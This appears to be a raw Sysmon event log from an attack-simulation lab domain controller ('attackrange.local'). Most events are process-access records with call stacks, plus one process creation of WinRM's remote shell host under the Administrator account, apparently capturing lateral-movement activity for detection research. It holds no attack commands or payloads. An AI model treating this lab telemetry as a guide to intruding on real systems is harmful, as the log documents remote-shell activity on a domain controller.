dministrator{266CAFBE-6439-6064-4FB3-100000000000}0x10b34f0HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{266CAFBE-6439-6064-C502-00000000AD01}4544C:\Windows\System32\winrshost.exeC:\Windows\system32\WinrsHost.exe -Embedding 10341000x800000000000000069Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:53.777{266CAFBE-62DA-6064-0B00-00000000AD01}8562840C:\Windows\system32\lsass.exe{266CAFBE-62DD-6064-1400-00000000AD01}1340C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+1d1e8|C:\Windows\system32\lsasrv.dll+1c411|C:\Windows\system32\lsasrv.dll+1ac30|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000068Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:53.777{266CAFBE-62DA-6064-0B00-00000000AD01}8562840C:\Windows\system32\lsass.exe{266CAFBE-62DD-6064-1400-00000000AD01}1340C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+19616|C:\Windows\system32\lsasrv.dll+1abbf|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000067Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:53.777{266CAFBE-62DA-6064-0B00-00000000AD01}8562840C:\Windows\system32\lsass.exe{266CAFBE-62DD-6064-1400-00000000AD01}1340C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+1a18d|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000066Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:53.746{266CAFBE-62DD-6064-1400-00000000AD01}13401036C:\Windows\system32\svchost.exe{266CAFBE-6439-6064-C502-00000000AD01}4544C:\Windows\system32\WinrsHost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\winrscmd.dll+8d36|C:\Windows\system32\winrscmd.dll+92d5|C:\Windows\system32\winrscmd.dll+af31|C:\Windows\system32\winrscmd.dll+23dc|c:\windows\system32\wsmsvc.dll+155ac7|c:\windows\system32\wsmsvc.dll+13f76d|c:\windows\system32\wsmsvc.dll+13f3cf|c:\windows\system32\wsmsvc.dll+13fcb2|c:\windows\system32\wsmsvc.dll+9ab10|c:\windows\system32\wsmsvc.dll+9b611|c:\windows\system32\wsmsvc.dll+4495|c:\windows\system32\wsmsvc.dll+16816c|c:\windows\system32\wsmsvc.dll+1689b8|c:\windows\system32\wsmsvc.dll+16345b|c:\windows\system32\wsmsvc.dll+163125|c:\windows\system32\wsmsvc.dll+14ce9c|c:\windows\system32\wsmsvc.dll+130049|c:\windows\system32\wsmsvc.dll+13571a|c:\windows\system32\wsmsvc.dll+12f47e|c:\windows\system32\wsmsvc.dll+125587|c:\windows\system32\wsmsvc.dll+11f562|c:\windows\system32\wsmsvc.dll+124574 10341000x800000000000000065Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:53.715{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6439-6064-C502-00000000AD01}4544C:\Windows\system32\WinrsHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000064Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:53.699{266CAFBE-6439-6064-C602-00000000AD01}49122544C:\Windows\system32\conhost.exe{266CAFBE-6439-6064-C502-00000000AD01}4544C:\Windows\system32\WinrsHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000063Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:53.637{266CAFBE-62C8-6064-0500-00000000AD01}620744C:\Windows\system32\csrss.exe{266CAFBE-6439-6064-C602-00000000AD01}4912C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x800000000000000062Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:53.637{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000061Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:53.637{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000060Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:53.637{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000059Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:53.637{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000058Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:53.637{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000057Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:53.637{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000056Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:53.637{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000055Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:53.637{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000054Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:53.637{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000053Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:53.637{266CAFBE-62C8-6064-0500-00000000AD01}6201152C:\Windows\system32\csrss.exe{266CAFBE-6439-6064-C502-00000000AD01}4544C:\Windows\system32\WinrsHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x800000000000000052Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:53.637{266CAFBE-62DD-6064-0C00-00000000AD01}81068C:\Windows\system32\svchost.exe{266CAFBE-6439-6064-C502-00000000AD01}4544C:\Windows\system32\WinrsHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+35069|c:\windows\system32\rpcss.dll+3a852|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x800000000000000051Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:53.638{266CAFBE-6439-6064-C502-00000000AD01}4544C:\Windows\System32\winrshost.exe10.0.14393.0 (rs1_release.160715-1616)Host Process for WinRM's Remote Shell pluginMicrosoft® Windows® Operating SystemMicrosoft Corporationwinrshost.exeC:\Windows\system32\WinrsHost.exe -EmbeddingC:\Windows\system32\ATTACKRANGE\Administrator{266CAFBE-6439-6064-4FB3-100000000000}0x10b34f0HighMD5=F40EC96CA18D88CB1F26FA2070010714,SHA256=607C014A3CA531FFAD50BCD90095C01E4E6B691D9E18473C70E4699CF1E31453,IMPHASH=4216D8E7F36901B61DFD6309B49BCF96{266CAFBE-62DD-6064-0C00-00000000AD01}8C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch 10341000x800000000000000050Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:53.621{266CAFBE-62DA-6064-0B00-00000000AD01}856584C:\Windows\system32\lsass.exe{266CAFBE-62DD-6064-1400-00000000AD01}1340C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+1d1e8|C:\Windows\system32\lsasrv.dll+1c411|C:\Windows\system32\lsasrv.dll+1ac30|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000049Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:53.621{266CAFBE-62DA-6064-0B00-00000000AD01}856584C:\Windows\system32\lsass.exe{266CAFBE-62DD-6064-1400-00000000AD01}1340C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+19616|C:\Windows\system32\lsasrv.dll+1abbf|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000048Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:53.621{266CAFBE-62DA-6064-0B00-00000000AD01}856584C:\Windows\system32\lsass.exe{266CAFBE-62DD-6064-1400-00000000AD01}1340C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+1a18d|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000047Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:53.434{266CAFBE-62DA-6064-0B00-00000000AD01}856584C:\Windows\system32\lsass.exe{266CAFBE-62DD-6064-1400-00000000AD01}1340C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+1d1e8|C:\Windows\system32\lsasrv.dll+1c411|C:\Windows\system32\lsasrv.dll+1ac30|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000046Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:53.434{266CAFBE-62DA-6064-0B00-00000000AD01}856584C:\Windows\system32\lsass.exe{266CAFBE-62DD-6064-1400-00000000AD01}1340C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+19616|C:\Windows\system32\lsasrv.dll+1abbf|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000045Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:53.434{266CAFBE-62DA-6064-0B00-00000000AD01}856584C:\Windows\system32\lsass.exe{266CAFBE-62DD-6064-1400-00000000AD01}1340C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+1a18d|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 